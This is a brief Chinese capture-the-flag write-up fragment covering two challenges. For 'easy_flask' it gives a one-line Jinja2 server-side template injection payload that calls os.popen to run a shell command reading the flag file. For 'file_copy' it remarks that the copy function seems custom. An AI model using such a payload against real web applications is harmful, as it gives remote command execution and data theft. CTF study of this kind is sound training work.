easy_flask有ssti注入,直接打{{config.__class__.__init__.__globals__['os'].popen('tacf???').read()}}file_copy上来给了个提示说是copy文件.然而不知道copy哪去了,只能看到文件多大.触发报错的时候看到了这样的提示这个copy估计不是php里原生的函数,而是自己定义的(